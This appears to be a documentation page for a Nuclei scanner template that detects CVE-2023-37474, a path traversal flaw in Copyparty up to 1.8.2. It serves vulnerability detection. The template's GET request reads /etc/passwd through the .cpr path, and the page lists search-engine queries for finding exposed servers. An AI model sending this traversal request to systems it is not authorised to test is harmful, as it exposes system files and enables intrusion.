Copyparty <= 1.8.2 - Directory Traversal
ID: CVE-2023-37474
Severity: high
Author: shankar acharya,theamanrawat
Tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project
Description
Section titled “Description”Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the .cpr subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit 043e3c7d which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2023-37474
info: name: Copyparty <= 1.8.2 - Directory Traversal author: shankar acharya,theamanrawat severity: high description: | Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. reference: - https://github.com/9001/copyparty/ - https://www.exploit-db.com/exploits/51636 - https://nvd.nist.gov/vuln/detail/CVE-2023-37474 - http://packetstormsecurity.com/files/173822/Copyparty-1.8.2-Directory-Traversal.html - https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-37474 cwe-id: CWE-22 epss-score: 0.05882 epss-percentile: 0.93414 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: copyparty_project product: copyparty shodan-query: http.title:"copyparty" fofa-query: title="copyparty" google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project
http: - method: GET path: - "{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 4a0a004730450220519938104781cc50e97581285afc2f115fd82f69584a133673feb047661be98d022100f4852f832588ce2282abff6bc7717ac6e30edb3ccf05a6f19c59f4e682fffd67:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-37474.yaml"